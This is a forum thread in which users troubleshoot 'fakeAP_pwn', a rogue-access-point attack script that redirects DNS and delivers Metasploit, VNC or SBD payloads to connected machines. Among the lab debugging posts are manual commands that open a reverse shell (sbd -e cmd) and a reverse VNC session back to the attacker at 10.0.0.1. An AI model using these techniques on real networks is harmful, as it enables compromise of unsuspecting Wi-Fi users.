[Script] [Video] fakeAP_pwn (v0.3)

[Eatme]

What IP does the targets get?
Can you ping the fake AP? (10.0.0.1?)
Can you ping google?
Could you post the output from -d?

My fakeAP_pwn Log:

fakeAP_pwn.log

[kernel831]

Are you using airbase-ng?
What speed does the target download the payload?
Firewalls?
How long do you wait for?

• Yes this is with airbase-ng, I havn't had any consistency problems with it at all like alot of these people.
• No firewall on the windows 7 ultimate victim, and I shouldn't have to deal with a firewall in BT should I?
• I'v done this quite a few times, I give it about 15 minutes until I give up
• Download speed from victim is fast, the windows vnc payload takes ~1-2 seconds.

Any ideas?

[g0tmi1k]

My fakeAP_pwn Log:

http://pastebin.com/5KLQMCTk]fakeAP_pwn.log[/url]

Thanks! *Now we have a little idea what happening*

Is it me, or that kernel doesn't look right? Sorry, I don't have BT4 any more to check.

Linux eXe 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux

You're also not using the latest version

Code:

bash fakeAP_pwn.sh -u

What about the ping test on the target to the attacker?

Code:

ping 10.0.0.100
ping 10.0.0.1
ping google.com

*and on that note, what address does the target get?*

Is the DNS redirection working?
If you go to google.com, yahoo.com, aol.com, whateveryoulike.com does it force you to the attacker?
*make sure to empty the cache*

What speed does the target download the exploit?

How far away is the target from the attacker?

[g0tmi1k]

you have to compile hostapd as follows below:

Code:

git clone git://w1.fi/srv/git/hostap.git
cd hostap/hostapd

# Copy the default config to .config for use during this build
cp defconfig .config

# Edit .config
vi .config 

#  you need to uncomment these lines, at a minimum
# 
#  CONFIG_DRIVER_NL80211=y
#  LIBNL=/usr
#  CFLAGS += -I$(LIBNL)/include
#  LIBS += -L$(LIBNL)/lib

make
make install

This has been added into the script (#108)
After a couple of tries, I've FINALLY got hostapd working. *and it's worth it*

I have tested it with 3 different WiFi Cards:
Linksys WUSB54G (rt73usb) --- Works
Alfa AWUS036H (rtl8187) --- Doesn't work
Intel Link 5100 (iwlagn) --- Doesn't work
*I would like to point out, all 3 of the above WiFi cards, works with airbase-ng*

I'm just going to say a couple of things *HOPEFULLY* this will save a few posts...
How do I check if my card will work with hostapd? Drivers - Linux Wireless
How do I know what driver I'm using? Run, airmon-ng
What if my driver isn't on the list? Try Google. (=
My driver is on the list, but it says "No" in the "AP" column... Then your WiFi card isn't support and I don't think it's going to work...
But it works for everything else... Well I don't think its going to work with this!
But I can install hostapd... It doesn't mean it will work!
But when I run it gives me...

Code:

nl80211: Failed to set interface wlan0 into AP mode
nl80211 driver initialization failed.
 ELOOP: remaining socket: sock=4 eloop_data=0x98e...

Yea, that's it not working because it's not supported

[parrotface]

Hostapd now working thanks to Joker5bb and things feel more stable.
My main problem now is that the victim can’t surf the net.
I get a meterpreter session and can get a shell command working.
Script set as sbd and is in transparent mode
Can ping 10.0.0.1 & ping router
If I try ping Google it answers 10.0.0.1
browse 173.195.37.104 and google page shows
browse Google fails to load
Attacker can browse internet OK
I guess it’s a DNS problem

fakeAP_pwn.log
Restoring apache~ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && a2dismod ssl && /etc/init.d/apache2 stop
Stopping web server: apache2 ... waiting .
Restoring apache~rm /etc/apache2/sites-available/fakeAP_pwn
~
Many Thanks

[Eatme]

Thanks! *Now we have a little idea what happening*

Is it me, or that kernel doesn't look right? Sorry, I don't have BT4 any more to check.


You're also not using the latest version

Code:

bash fakeAP_pwn.sh -u

What about the ping test on the target to the attacker?

Code:

ping 10.0.0.100
ping 10.0.0.1
ping google.com

*and on that note, what address does the target get?*

Is the DNS redirection working?
If you go to google.com, yahoo.com, aol.com, whateveryoulike.com does it force you to the attacker?
*make sure to empty the cache*

What speed does the target download the exploit?

How far away is the target from the attacker?

1. Updating kernel as I type this. Will retry after I finish

2. OK updated to #108

3. Im doing this from the targets PC->

Code:

C:\Windows\system32>ping 10.0.0.100

Pinging 10.0.0.100 with 32 bytes of data:
Reply from 10.0.0.150: Destination host unreachable.
Reply from 10.0.0.150: Destination host unreachable.
Reply from 10.0.0.150: Destination host unreachable.

Ping statistics for 10.0.0.100:
    Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
Control-C
^C
C:\Windows\system32>ping 10.0.0.1

Pinging 10.0.0.1 with 32 bytes of data:
Reply from 10.0.0.1: bytes=32 time=17ms TTL=64
Reply from 10.0.0.1: bytes=32 time=5ms TTL=64
Reply from 10.0.0.1: bytes=32 time=12ms TTL=64
Reply from 10.0.0.1: bytes=32 time=985ms TTL=64

Ping statistics for 10.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 5ms, Maximum = 985ms, Average = 254ms

C:\Windows\system32>ping google.com

Pinging google.com [10.0.0.1] with 32 bytes of data:
Reply from 10.0.0.1: bytes=32 time=274ms TTL=64
Reply from 10.0.0.1: bytes=32 time=130ms TTL=64
Reply from 10.0.0.1: bytes=32 time=2747ms TTL=64
Reply from 10.0.0.1: bytes=32 time=140ms TTL=64

Ping statistics for 10.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 130ms, Maximum = 2747ms, Average = 822ms

*4. 10.0.0.150

5. Yes DNS redirection is working. (whatever address 'www.test.com' I put in it goes to the update page)

6. DL speed starts at 7.60 KB /s, then half way through it drops to about 333 bytes /s.

7. I'm testing this on 1 computer atm.

-my original OS as the "target" is Win7-Ult - same pc
-As the attacker, I'm using Vmware-BT4 - same pc
(Basically the same setup you did in your video if you did it on the same pc)

[joker5bb]

to see if you can run hostapd with your card just run:

Code:

iw phy0 info

and look if it has AP mode

[g0tmi1k]

1. Updating kernel as I type this. Will retry after I finish

2. OK updated to #108

3. Im doing this from the targets PC->

Code:

C:\Windows\system32>ping 10.0.0.100

Pinging 10.0.0.100 with 32 bytes of data:
Reply from 10.0.0.150: Destination host unreachable.
Reply from 10.0.0.150: Destination host unreachable.
Reply from 10.0.0.150: Destination host unreachable.

Ping statistics for 10.0.0.100:
    Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
Control-C
^C
C:\Windows\system32>ping 10.0.0.1

Pinging 10.0.0.1 with 32 bytes of data:
Reply from 10.0.0.1: bytes=32 time=17ms TTL=64
Reply from 10.0.0.1: bytes=32 time=5ms TTL=64
Reply from 10.0.0.1: bytes=32 time=12ms TTL=64
Reply from 10.0.0.1: bytes=32 time=985ms TTL=64

Ping statistics for 10.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 5ms, Maximum = 985ms, Average = 254ms

C:\Windows\system32>ping google.com

Pinging google.com [10.0.0.1] with 32 bytes of data:
Reply from 10.0.0.1: bytes=32 time=274ms TTL=64
Reply from 10.0.0.1: bytes=32 time=130ms TTL=64
Reply from 10.0.0.1: bytes=32 time=2747ms TTL=64
Reply from 10.0.0.1: bytes=32 time=140ms TTL=64

Ping statistics for 10.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 130ms, Maximum = 2747ms, Average = 822ms

*4. 10.0.0.150

5. Yes DNS redirection is working. (whatever address 'www.test.com' I put in it goes to the update page)

6. DL speed starts at 7.60 KB /s, then half way through it drops to about 333 bytes /s.

7. I'm testing this on 1 computer atm.

-my original OS as the "target" is Win7-Ult - same pc
-As the attacker, I'm using Vmware-BT4 - same pc
(Basically the same setup you did in your video if you did it on the same pc)

1.) I dont think that is the source of the problem, but it cant hurt
2.) Same thing in 108? and with the new kernal?
3.) ... 10.0.0.100 was meant the answer of number 4.
4.) No point in trying to ping this, as 10.0.0.1 is working.
5.) Good.
6.) ... right, this is where the problem could be! Your speed! Its "taking forever" for metasploit to upload. Why is it happening? Running in VM isn't a great idea... Or it's your hardware...or something else
7.) I was asking due because of signal strenght! If your too far/close to each other its not going to work. For example, I couldn't use my laptop attacking my desktop if it was on the desk.

to see if you can run hostapd with your card just run:

Code:

iw phy0 info

and look if it has AP mode

That works for me on ubuntu, doesn't work in BackTrack! *Using the same install method & WiFi card*

[Eatme]

1.) I dont think that is the source of the problem, but it cant hurt
2.) Same thing in 108? and with the new kernal?
3.) ... 10.0.0.100 was meant the answer of number 4.
4.) No point in trying to ping this, as 10.0.0.1 is working.
5.) Good.
6.) ... right, this is where the problem could be! Your speed! Its "taking forever" for metasploit to upload. Why is it happening? Running in VM isn't a great idea... Or it's your hardware...or something else
7.) I was asking due because of signal strenght! If your too far/close to each other its not going to work. For example, I couldn't use my laptop attacking my desktop if it was on the desk.




That works for me on ubuntu, doesn't work in BackTrack! *Using the same install method & WiFi card*

Oh OK, so being to close might be my problem then...

I haven't tried it (108#) on the new kernel yet, I'm just finish installing it due to I had to re-install BT4 all together due to a noob mistake trying to install it.

I'll run the script in about 15 min. and post details..Thanks

[g0tmi1k]

*** I didn't see these reply last night...***

* Yes this is with airbase-ng, I havn't had any consistency problems with it at all like alot of these people.
* No firewall on the windows 7 ultimate victim, and I shouldn't have to deal with a firewall in BT should I?
* I'v done this quite a few times, I give it about 15 minutes until I give up
* Download speed from victim is fast, the windows vnc payload takes ~1-2 seconds.
Any ideas?

What verion are you using? Try #108, then can you post the the report -d makes?
Is it using the cache to download?
Unless you have edited/chance something in backtrack - you shouldn't have a issue with firewalls...
For the record, 5 minutes is too long
What if you manually do some Metasploit-fu?
What if you take manally tranfer either SBD or VNC accross, and run the commands

Code:

VNC
copy winvnc.exe, vnchooks.dll, vnc.reg (from the $www folder) to C:\
start -> run -> cmd
regedit.exe /S C:\vnc.reg
C:\winvnc.exe -kill -run
C:\winvnc.exe -connect 10.0.0.1

SBD
copy sbd.exe (from the $www folder) to C:\
start -> run -> cmd
C:\sbd.exe -q -r 10 -k g0tmi1k -e cmd -p *WHATEVER PORT fakeAP_pwn says* 10.0.0.1

maybe port scan 10.0.0.1 (from the target to the attacker)?

Hostapd now working thanks to Joker5bb and things feel more stable.
My main problem now is that the victim can’t surf the net.
I get a meterpreter session and can get a shell command working.
Script set as sbd and is in transparent mode
Can ping 10.0.0.1 & ping router
If I try ping Google it answers 10.0.0.1
browse 173.195.37.104 and google page shows
browse Google fails to load
Attacker can browse internet OK
I guess it’s a DNS problem

fakeAP_pwn.log
Restoring apache~ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && a2dismod ssl && /etc/init.d/apache2 stop
Stopping web server: apache2 ... waiting .
Restoring apache~rm /etc/apache2/sites-available/fakeAP_pwn
~
Many Thanks

Does "normal" mode work okay? *got a feeling it will*
On the target, try emptying the arp cache (arp -d *), as well as the firefox (?) cache.
*thinking about it...I can remember having this problem at one stage*
and yes, Apache stops after the infection. If you enable it again, instead of getting 404 errors, you will see the web server (again).
Edit: Could you also try disconnecting, joining again after becoming "infected"?

Oh OK, so being to close might be my problem then...

I haven't tried it (108#) on the new kernel yet, I'm just finish installing it due to I had to re-install BT4 all together due to a noob mistake trying to install it.

I'll run the script in about 15 min. and post details..Thanks

It was a issue for me! I had to unscrew the antenna of one of my WiFi cards...and the signal as still very strong! #108 has a lot of bug fixes and more of a detailed log file...worth trying!